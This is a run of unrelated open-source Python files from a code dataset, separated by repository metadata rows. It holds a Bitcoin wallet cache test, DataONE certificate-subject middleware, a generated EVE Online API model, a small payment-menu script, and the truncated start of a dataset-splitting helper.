# Check input and output caches
assert txid in cm._inputs_cache
assert len(cm._inputs_cache[txid]) == 2
assert txid in cm._outputs_cache
assert cm._outputs_cache[txid][0]['output'] is not None
assert cm._outputs_cache[txid][1]['output'] is not None
assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
out_txid1 = "5fcfa7cf78b53f78cc58a339da3ca4e7fe188cee2e24448e7558215a00cc9a8a"
assert out_txid1 in cm._outputs_cache
assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
out_txid2 = "305839bd673fbe08a0ee47014a6b9dcb3579bd74ffbc343d608f7758f17e8515"
assert out_txid2 in cm._outputs_cache
assert len(cm._outputs_cache[out_txid2].keys()) == 1
assert cm._outputs_cache[out_txid2][2]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
# Check that confirmed balances are 0 for the out_addrs
out_a = [a[0] for a in out_addrs]
conf_addr_balances = cm.get_balances(out_a)
unconf_addr_balances = cm.get_balances(out_a, True)
for addr, exp_bal in out_addrs:
assert conf_addr_balances[addr] == 0
assert unconf_addr_balances[addr] == exp_bal
# Check utxos
conf_addr_utxos = cm.get_utxos(out_a)
unconf_addr_utxos = cm.get_utxos(out_a, True)
for addr, exp_bal in out_addrs:
assert addr not in conf_addr_utxos
assert addr in unconf_addr_utxos
assert len(unconf_addr_utxos[addr]) == 1
utxo = unconf_addr_utxos[addr][0]
assert utxo.value == exp_bal
assert utxo.num_confirmations == 0
# Reinsert the transaction with it as confirmed now
txn = WalletTransaction.from_hex(txn_hex)
txn.block = 374442
txn.block_hash = Hash('000000000000000001de250dcfa47f8313aec2f1f41a56f4fb0d099eb497c2b2')
txn.confirmations = 7684
cm.insert_txn(txn)
assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT
assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT
assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT
assert cm._outputs_cache[out_txid2][2]['status'] == CacheManager.SPENT
# Check the balances again
conf_addr_balances = cm.get_balances(out_a)
unconf_addr_balances = cm.get_balances(out_a, True)
for addr, exp_bal in out_addrs:
assert conf_addr_balances[addr] == exp_bal
assert unconf_addr_balances[addr] == exp_bal
# Check utxos again
conf_addr_utxos = cm.get_utxos(out_a)
unconf_addr_utxos = cm.get_utxos(out_a, True)
for addr, exp_bal in out_addrs:
assert addr in conf_addr_utxos
assert addr in unconf_addr_utxos
assert len(conf_addr_utxos[addr]) == 1
assert len(unconf_addr_utxos[addr]) == 1
utxo = conf_addr_utxos[addr][0]
assert utxo.value == exp_bal
assert utxo.num_confirmations == 7684
# Insert a transaction that spends from one of the out addrs in
# the above transactions.
# 1. Insert it provisionally
# 2. Re-insert as unconfirmed
# 3. Re-insert as confirmed
txn_hex = "01000000021ef63ad4dab2c227c7ffcb063916e824bd54c2f463a5ce4b48b6a70a9f3b4fd2000000006a473044022051008f06f1fc5783364712c7bf175c383ebb92c1001ba9f744f5170d5af00bb9022012baa83b3611b2c0e637d2f5e62dd3f6f4debfca805f8a42df6719a67614824d0121027fc10ccde9240463a86c983d2c8d1301311c9debf510119418b0da7b6fdb7ee7ffffffff8ebe0ae5e97c1b3b5742ab7a0253a9e711c27650ce58c25a43bccd817af27937000000006a473044022076fd5835628d4867b489c4c7afa885de33417a3536276b3f7066155b1bd79c15022030a218c2ca35b27e2beefb2298a0bf6fc9eabe93e07f388a1a3aee878025a7b6012102bed99adff9710dbc3e9f7966037d5824ffb134aeba70aec70e34e7eeb6547a94ffffffff0240420f00000000001976a914952e023bf19047e9a014af4ec067667695d8c99488acf8340f00000000001976a914743281d388add04da28e10a12af09c853f98609888ac00000000" # nopep8
txn = WalletTransaction.from_hex(txn_hex)
# First test with a very short expiration
cm.insert_txn(txn, mark_provisional=True, expiration=1)
txid = "6fd3c96d466cd465b40e59be14d023c27f1d0ca13075119d3d6baeebfc587b8c"
assert txid in cm._txn_cache
assert cm._txn_cache[txid].provisional
time.sleep(1.5)
cm.prune_provisional_txns()
assert txid not in cm._txn_cache
# Now do default expiration
cm.insert_txn(txn, mark_provisional=True)
assert txid in cm._txn_cache
in_addrs = ["15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8",
"15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb"]
out_addrs = [("1EbnoKrmUEe3hsK9gTVfgYAming6BuqM3L", 1000000),
("1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm", 996600)]
for i, a in enumerate(out_addrs):
assert a[0] in cm._txns_by_addr
assert list(cm._deposits_for_addr[a[0]][txid]) == [i]
for i, a in enumerate(in_addrs):
assert list(cm._spends_for_addr[a][txid]) == [i]
# Check input and output caches
assert txid in cm._inputs_cache
assert len(cm._inputs_cache[txid]) == 2
assert txid in cm._outputs_cache
assert cm._outputs_cache[txid][0]['output'] is not None
assert cm._outputs_cache[txid][1]['output'] is not None
assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED # nopep8
assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED # nopep8
out_txid1 = "d24f3b9f0aa7b6484bcea563f4c254bd24e8163906cbffc727c2b2dad43af61e"
assert out_txid1 in cm._outputs_cache
assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED # nopep8
out_txid2 = "3779f27a81cdbc435ac258ce5076c211e7a953027aab42573b1b7ce9e50abe8e"
assert out_txid2 in cm._outputs_cache
assert len(cm._outputs_cache[out_txid2].keys()) == 2
assert cm._outputs_cache[out_txid2][0]['status'] == CacheManager.SPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED # nopep8
# Check that confirmed balances are 0 for the out_addrs
out_a = [a[0] for a in out_addrs]
conf_addr_balances = cm.get_balances(out_a)
unconf_addr_balances = cm.get_balances(out_a, True)
for addr, exp_bal in out_addrs:
assert conf_addr_balances[addr] == 0
assert unconf_addr_balances[addr] == exp_bal
# Check utxos
conf_addr_utxos = cm.get_utxos(out_a)
unconf_addr_utxos = cm.get_utxos(out_a, True)
for addr, exp_bal in out_addrs:
assert addr not in conf_addr_utxos
assert addr in unconf_addr_utxos
assert len(unconf_addr_utxos[addr]) == 1
utxo = unconf_addr_utxos[addr][0]
assert utxo.value == exp_bal
assert utxo.num_confirmations == 0
# Re-insert as unconfirmed
txn = WalletTransaction.from_hex(txn_hex)
cm.insert_txn(txn, mark_provisional=False)
# Only the statuses should change, so check those.
assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
assert cm._outputs_cache[out_txid2][0]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
# Re-insert as confirmed
txn = WalletTransaction.from_hex(txn_hex)
txn.block = 374445
txn.block_hash = Hash("000000000000000004c241778cbbc269e912df5fe8d856efaea916daa82d2575")
txn.confirmations = 7781
cm.insert_txn(txn, mark_provisional=False)
# Only the statuses should change, so check those.
assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT
assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT
assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT
assert cm._outputs_cache[out_txid2][0]['status'] == CacheManager.SPENT
# Check balances
out_a = [a[0] for a in out_addrs]
conf_addr_balances = cm.get_balances(out_a)
unconf_addr_balances = cm.get_balances(out_a, True)
for addr, exp_bal in out_addrs:
assert conf_addr_balances[addr] == exp_bal
assert unconf_addr_balances[addr] == exp_bal
# Check utxos
conf_addr_utxos = cm.get_utxos(out_a)
unconf_addr_utxos = cm.get_utxos(out_a, True)
for addr, exp_bal in out_addrs:
assert addr in conf_addr_utxos
assert addr in unconf_addr_utxos
assert len(unconf_addr_utxos[addr]) == 1
utxo = conf_addr_utxos[addr][0]
assert utxo.value == exp_bal
assert utxo.num_confirmations == 7781
# Check utxos for all addresses that have deposits - we should only have 4
addrs = ["1DpCouKa2evX3f2aELUy7iNdsrYuLLaqWy",
"1GcmBmvYWJKLFHxrTtx5DqQLV7oHQAkH2c",
"15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8",
"15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb",
"1EbnoKrmUEe3hsK9gTVfgYAming6BuqM3L",
"1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm",
"1Ezv6YmYsZvALUaRcZRf8hBdxYni6cm78X",
"16Mcvb7fYhif94d1RHCn5AE2dm1oXCGnH6",
"12m3fcaabUgYwWcodgVZUGH6ntFqVrHk5C",
"18VjAjZ7Au8U75LCHT7aH7mTwKETZwHTpi"]
conf_utxos = cm.get_utxos(addrs)
assert len(conf_utxos) == 4
utxo_addrs_values = [("18VjAjZ7Au8U75LCHT7aH7mTwKETZwHTpi", 23264),
("12m3fcaabUgYwWcodgVZUGH6ntFqVrHk5C", 204154),
("1EbnoKrmUEe3hsK9gTVfgYAming6BuqM3L", 1000000),
("1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm", 996600)]
for a, value in utxo_addrs_values:
assert a in conf_utxos
assert len(conf_utxos[a]) == 1
assert conf_utxos[a][0].value == value
assert "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8" not in conf_utxos
assert "15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb" not in conf_utxos
# Now delete the last transaction
cm._delete_txn(txid)
assert txid not in cm._txn_cache
assert txid not in cm._inputs_cache
assert txid not in cm._outputs_cache
for in_addr in in_addrs:
assert in_addr not in cm._spends_for_addr
for out_addr, _ in out_addrs:
assert out_addr not in cm._deposits_for_addr
for out_txid, index in [(out_txid1, 0), (out_txid2, 0)]:
out = cm._outputs_cache[out_txid][index]
assert out['status'] == CacheManager.UNSPENT
assert out['spend_txid'] is None
assert out['spend_index'] is None
def test_whole(cache, exp_conf_balance, exp_unconf_balance):
cm = CacheManager()
# Don't prune for testing purposes
cm.load_from_dict(cache, prune_provisional=False)
addrs = cm.get_addresses_for_chain(0x80000000, 0) + \
cm.get_addresses_for_chain(0x80000000, 1)
conf_balances = cm.get_balances(addrs)
unconf_balances = cm.get_balances(addrs, True)
conf_balance = sum([v for k, v in conf_balances.items()])
unconf_balance = sum([v for k, v in unconf_balances.items()])
assert conf_balance == exp_conf_balance
assert unconf_balance == exp_unconf_balance
| 17,618 | 0 | 69 |
b5843875e6ebc5bf39ab131cdc98ecca22a19925 | 2,696 | py | Python | gmn/src/d1_gmn/app/middleware/session_cert.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 15 | 2016-10-28T13:56:52.000Z | 2022-01-31T19:07:49.000Z | gmn/src/d1_gmn/app/middleware/session_cert.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 56 | 2017-03-16T03:52:32.000Z | 2022-03-12T01:05:28.000Z | gmn/src/d1_gmn/app/middleware/session_cert.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 11 | 2016-05-31T16:22:02.000Z | 2020-10-05T14:37:10.000Z | # This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extract subjects from a DataONE X.509 v3 certificate.
If a certificate was provided, it has been validated by Apache before being
passed to GMN. So it is known to signed by a trusted CA and to be unexpired.
A user can connect without providing a certificate (and so, without providing a
session). This limits the user's access to data that is publicly available.
A user can connect with a certificate that does not contain a list of
equivalent identities and group memberships (no SubjectInfo). This limits the
user's access to data that is publicly available and that is available directly
to that user (as designated in the Subject DN).
"""
import d1_common.cert.subjects
import d1_common.const
import d1_common.types.exceptions
def get_subjects(request):
"""Get all subjects in the certificate.
- Returns: primary_str (primary subject), equivalent_set (equivalent identities,
groups and group memberships)
- The primary subject is the certificate subject DN, serialized to a DataONE
compliant subject string.
"""
if _is_certificate_provided(request):
try:
return get_authenticated_subjects(request.META["SSL_CLIENT_CERT"])
except Exception as e:
raise d1_common.types.exceptions.InvalidToken(
0,
'Error extracting session from certificate. error="{}"'.format(str(e)),
)
else:
return d1_common.const.SUBJECT_PUBLIC, set()
def get_authenticated_subjects(cert_pem):
"""Return primary subject and set of equivalents authenticated by certificate.
- ``cert_pem`` can be str or bytes
"""
if isinstance(cert_pem, str):
cert_pem = cert_pem.encode("utf-8")
return d1_common.cert.subjects.extract_subjects(cert_pem)
| 37.444444 | 87 | 0.738501 | # This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extract subjects from a DataONE X.509 v3 certificate.
If a certificate was provided, it has been validated by Apache before being
passed to GMN. So it is known to signed by a trusted CA and to be unexpired.
A user can connect without providing a certificate (and so, without providing a
session). This limits the user's access to data that is publicly available.
A user can connect with a certificate that does not contain a list of
equivalent identities and group memberships (no SubjectInfo). This limits the
user's access to data that is publicly available and that is available directly
to that user (as designated in the Subject DN).
"""
import d1_common.cert.subjects
import d1_common.const
import d1_common.types.exceptions
def get_subjects(request):
"""Get all subjects in the certificate.
- Returns: primary_str (primary subject), equivalent_set (equivalent identities,
groups and group memberships)
- The primary subject is the certificate subject DN, serialized to a DataONE
compliant subject string.
"""
if _is_certificate_provided(request):
try:
return get_authenticated_subjects(request.META["SSL_CLIENT_CERT"])
except Exception as e:
raise d1_common.types.exceptions.InvalidToken(
0,
'Error extracting session from certificate. error="{}"'.format(str(e)),
)
else:
return d1_common.const.SUBJECT_PUBLIC, set()
def get_authenticated_subjects(cert_pem):
"""Return primary subject and set of equivalents authenticated by certificate.
- ``cert_pem`` can be str or bytes
"""
if isinstance(cert_pem, str):
cert_pem = cert_pem.encode("utf-8")
return d1_common.cert.subjects.extract_subjects(cert_pem)
def _is_certificate_provided(request):
return "SSL_CLIENT_CERT" in request.META and request.META["SSL_CLIENT_CERT"] != ""
| 104 | 0 | 23 |
85357402a8301e1bda63a84a7fda7c6d2ae1162a | 8,452 | py | Python | swagger_client/models/get_fw_systems_200_ok.py | rseichter/bootini-star | a80258f01a05e4df38748b8cb47dfadabd42c20d | [
"MIT"
] | null | null | null | swagger_client/models/get_fw_systems_200_ok.py | rseichter/bootini-star | a80258f01a05e4df38748b8cb47dfadabd42c20d | [
"MIT"
] | null | null | null | swagger_client/models/get_fw_systems_200_ok.py | rseichter/bootini-star | a80258f01a05e4df38748b8cb47dfadabd42c20d | [
"MIT"
] | null | null | null | # coding: utf-8
"""
EVE Swagger Interface
An OpenAPI for EVE Online # noqa: E501
OpenAPI spec version: 0.8.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetFwSystems200Ok(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'solar_system_id': 'int',
'owner_faction_id': 'int',
'occupier_faction_id': 'int',
'victory_points': 'int',
'victory_points_threshold': 'int',
'contested': 'bool'
}
attribute_map = {
'solar_system_id': 'solar_system_id',
'owner_faction_id': 'owner_faction_id',
'occupier_faction_id': 'occupier_faction_id',
'victory_points': 'victory_points',
'victory_points_threshold': 'victory_points_threshold',
'contested': 'contested'
}
def __init__(self, solar_system_id=None, owner_faction_id=None, occupier_faction_id=None, victory_points=None, victory_points_threshold=None, contested=None): # noqa: E501
"""GetFwSystems200Ok - a model defined in Swagger""" # noqa: E501
self._solar_system_id = None
self._owner_faction_id = None
self._occupier_faction_id = None
self._victory_points = None
self._victory_points_threshold = None
self._contested = None
self.discriminator = None
self.solar_system_id = solar_system_id
self.owner_faction_id = owner_faction_id
self.occupier_faction_id = occupier_faction_id
self.victory_points = victory_points
self.victory_points_threshold = victory_points_threshold
self.contested = contested
@property
def solar_system_id(self):
"""Gets the solar_system_id of this GetFwSystems200Ok. # noqa: E501
solar_system_id integer # noqa: E501
:return: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._solar_system_id
@solar_system_id.setter
def solar_system_id(self, solar_system_id):
"""Sets the solar_system_id of this GetFwSystems200Ok.
solar_system_id integer # noqa: E501
:param solar_system_id: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if solar_system_id is None:
raise ValueError("Invalid value for `solar_system_id`, must not be `None`") # noqa: E501
self._solar_system_id = solar_system_id
@property
def owner_faction_id(self):
"""Gets the owner_faction_id of this GetFwSystems200Ok. # noqa: E501
owner_faction_id integer # noqa: E501
:return: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._owner_faction_id
@owner_faction_id.setter
def owner_faction_id(self, owner_faction_id):
"""Sets the owner_faction_id of this GetFwSystems200Ok.
owner_faction_id integer # noqa: E501
:param owner_faction_id: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if owner_faction_id is None:
raise ValueError("Invalid value for `owner_faction_id`, must not be `None`") # noqa: E501
self._owner_faction_id = owner_faction_id
@property
def occupier_faction_id(self):
"""Gets the occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
occupier_faction_id integer # noqa: E501
:return: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._occupier_faction_id
@occupier_faction_id.setter
def occupier_faction_id(self, occupier_faction_id):
"""Sets the occupier_faction_id of this GetFwSystems200Ok.
occupier_faction_id integer # noqa: E501
:param occupier_faction_id: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if occupier_faction_id is None:
raise ValueError("Invalid value for `occupier_faction_id`, must not be `None`") # noqa: E501
self._occupier_faction_id = occupier_faction_id
@property
def victory_points(self):
"""Gets the victory_points of this GetFwSystems200Ok. # noqa: E501
victory_points integer # noqa: E501
:return: The victory_points of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points
@victory_points.setter
def victory_points(self, victory_points):
"""Sets the victory_points of this GetFwSystems200Ok.
victory_points integer # noqa: E501
:param victory_points: The victory_points of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points is None:
raise ValueError("Invalid value for `victory_points`, must not be `None`") # noqa: E501
self._victory_points = victory_points
@property
def victory_points_threshold(self):
"""Gets the victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
victory_points_threshold integer # noqa: E501
:return: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points_threshold
@victory_points_threshold.setter
def victory_points_threshold(self, victory_points_threshold):
"""Sets the victory_points_threshold of this GetFwSystems200Ok.
victory_points_threshold integer # noqa: E501
:param victory_points_threshold: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points_threshold is None:
raise ValueError("Invalid value for `victory_points_threshold`, must not be `None`") # noqa: E501
self._victory_points_threshold = victory_points_threshold
@property
def contested(self):
"""Gets the contested of this GetFwSystems200Ok. # noqa: E501
contested boolean # noqa: E501
:return: The contested of this GetFwSystems200Ok. # noqa: E501
:rtype: bool
"""
return self._contested
@contested.setter
def contested(self, contested):
"""Sets the contested of this GetFwSystems200Ok.
contested boolean # noqa: E501
:param contested: The contested of this GetFwSystems200Ok. # noqa: E501
:type: bool
"""
if contested is None:
raise ValueError("Invalid value for `contested`, must not be `None`") # noqa: E501
self._contested = contested
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetFwSystems200Ok):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 32.383142 | 176 | 0.635353 | # coding: utf-8
"""
EVE Swagger Interface
An OpenAPI for EVE Online # noqa: E501
OpenAPI spec version: 0.8.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetFwSystems200Ok(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'solar_system_id': 'int',
'owner_faction_id': 'int',
'occupier_faction_id': 'int',
'victory_points': 'int',
'victory_points_threshold': 'int',
'contested': 'bool'
}
attribute_map = {
'solar_system_id': 'solar_system_id',
'owner_faction_id': 'owner_faction_id',
'occupier_faction_id': 'occupier_faction_id',
'victory_points': 'victory_points',
'victory_points_threshold': 'victory_points_threshold',
'contested': 'contested'
}
def __init__(self, solar_system_id=None, owner_faction_id=None, occupier_faction_id=None, victory_points=None, victory_points_threshold=None, contested=None): # noqa: E501
"""GetFwSystems200Ok - a model defined in Swagger""" # noqa: E501
self._solar_system_id = None
self._owner_faction_id = None
self._occupier_faction_id = None
self._victory_points = None
self._victory_points_threshold = None
self._contested = None
self.discriminator = None
self.solar_system_id = solar_system_id
self.owner_faction_id = owner_faction_id
self.occupier_faction_id = occupier_faction_id
self.victory_points = victory_points
self.victory_points_threshold = victory_points_threshold
self.contested = contested
@property
def solar_system_id(self):
"""Gets the solar_system_id of this GetFwSystems200Ok. # noqa: E501
solar_system_id integer # noqa: E501
:return: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._solar_system_id
@solar_system_id.setter
def solar_system_id(self, solar_system_id):
"""Sets the solar_system_id of this GetFwSystems200Ok.
solar_system_id integer # noqa: E501
:param solar_system_id: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if solar_system_id is None:
raise ValueError("Invalid value for `solar_system_id`, must not be `None`") # noqa: E501
self._solar_system_id = solar_system_id
@property
def owner_faction_id(self):
"""Gets the owner_faction_id of this GetFwSystems200Ok. # noqa: E501
owner_faction_id integer # noqa: E501
:return: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._owner_faction_id
@owner_faction_id.setter
def owner_faction_id(self, owner_faction_id):
"""Sets the owner_faction_id of this GetFwSystems200Ok.
owner_faction_id integer # noqa: E501
:param owner_faction_id: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if owner_faction_id is None:
raise ValueError("Invalid value for `owner_faction_id`, must not be `None`") # noqa: E501
self._owner_faction_id = owner_faction_id
@property
def occupier_faction_id(self):
"""Gets the occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
occupier_faction_id integer # noqa: E501
:return: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._occupier_faction_id
@occupier_faction_id.setter
def occupier_faction_id(self, occupier_faction_id):
"""Sets the occupier_faction_id of this GetFwSystems200Ok.
occupier_faction_id integer # noqa: E501
:param occupier_faction_id: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if occupier_faction_id is None:
raise ValueError("Invalid value for `occupier_faction_id`, must not be `None`") # noqa: E501
self._occupier_faction_id = occupier_faction_id
@property
def victory_points(self):
"""Gets the victory_points of this GetFwSystems200Ok. # noqa: E501
victory_points integer # noqa: E501
:return: The victory_points of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points
@victory_points.setter
def victory_points(self, victory_points):
"""Sets the victory_points of this GetFwSystems200Ok.
victory_points integer # noqa: E501
:param victory_points: The victory_points of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points is None:
raise ValueError("Invalid value for `victory_points`, must not be `None`") # noqa: E501
self._victory_points = victory_points
@property
def victory_points_threshold(self):
"""Gets the victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
victory_points_threshold integer # noqa: E501
:return: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points_threshold
@victory_points_threshold.setter
def victory_points_threshold(self, victory_points_threshold):
"""Sets the victory_points_threshold of this GetFwSystems200Ok.
victory_points_threshold integer # noqa: E501
:param victory_points_threshold: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points_threshold is None:
raise ValueError("Invalid value for `victory_points_threshold`, must not be `None`") # noqa: E501
self._victory_points_threshold = victory_points_threshold
@property
def contested(self):
"""Gets the contested of this GetFwSystems200Ok. # noqa: E501
contested boolean # noqa: E501
:return: The contested of this GetFwSystems200Ok. # noqa: E501
:rtype: bool
"""
return self._contested
@contested.setter
def contested(self, contested):
"""Sets the contested of this GetFwSystems200Ok.
contested boolean # noqa: E501
:param contested: The contested of this GetFwSystems200Ok. # noqa: E501
:type: bool
"""
if contested is None:
raise ValueError("Invalid value for `contested`, must not be `None`") # noqa: E501
self._contested = contested
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetFwSystems200Ok):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0 | 0 | 0 |
dfea545de52865e245de45e9353a7cf90987e97d | 288 | py | Python | PF/Inicio.py | HectorR28/uip-iiiq-pc3 | 7fd3f0f8191a7442f4330ff54d72eb6e157a740e | [
"MIT"
] | null | null | null | PF/Inicio.py | HectorR28/uip-iiiq-pc3 | 7fd3f0f8191a7442f4330ff54d72eb6e157a740e | [
"MIT"
] | null | null | null | PF/Inicio.py | HectorR28/uip-iiiq-pc3 | 7fd3f0f8191a7442f4330ff54d72eb6e157a740e | [
"MIT"
] | null | null | null | import FormaPago
import MenuOpciones
if __name__ == '__main__':
FormaPago.menuPagos()
opc = input("Dijite el numero de la opción que desea acceder: ")
if opc == "1":
MenuOpciones.OpcionCrear()
elif opc == "2":
MenuOpciones.OpcionCambiar()
| 24 | 69 | 0.618056 | import FormaPago
import MenuOpciones
if __name__ == '__main__':
FormaPago.menuPagos()
opc = input("Dijite el numero de la opción que desea acceder: ")
if opc == "1":
MenuOpciones.OpcionCrear()
elif opc == "2":
MenuOpciones.OpcionCambiar()
| 0 | 0 | 0 |
b7d0df4e655dd699076dac3a6a0a158b736eb180 | 2,196 | py | Python | I-Random-Forest/Algorithm_test_harness.py | raja21068/Research-on-data-mining-of-permission-induced-risk-for-android-IoT-devices | 522d3a0d0fde7dd2f51565e57e1bf30d8c7d9712 | [
"Apache-2.0"
] | 1 | 2021-04-02T05:48:46.000Z | 2021-04-02T05:48:46.000Z | I-Random-Forest/Algorithm_test_harness.py | raja21068/Research-on-data-mining-of-permission-induced-risk-for-android-IoT-devices | 522d3a0d0fde7dd2f51565e57e1bf30d8c7d9712 | [
"Apache-2.0"
] | null | null | null | I-Random-Forest/Algorithm_test_harness.py | raja21068/Research-on-data-mining-of-permission-induced-risk-for-android-IoT-devices | 522d3a0d0fde7dd2f51565e57e1bf30d8c7d9712 | [
"Apache-2.0"
] | null | null | null | from random import randrange
# Split a dataset into a train and test set
# Split a dataset into $k$ folds
# Evaluate an algorithm using a train/test split several times
# Evaluate an algorithm using a cross-validation split
| 37.220339 | 100 | 0.640255 | from random import randrange
# Split a dataset into a train and test set
def train_test_split(dataset, split):
train = list()
train_size = split * len(dataset)
dataset_copy = list(dataset)
while len(train) < train_size:
index = randrange(len(dataset_copy))
train.append(dataset_copy.pop(index))
return train, dataset_copy
# Split a dataset into $k$ folds
def cross_validation_split(dataset, n_folds):
dataset_split = list()
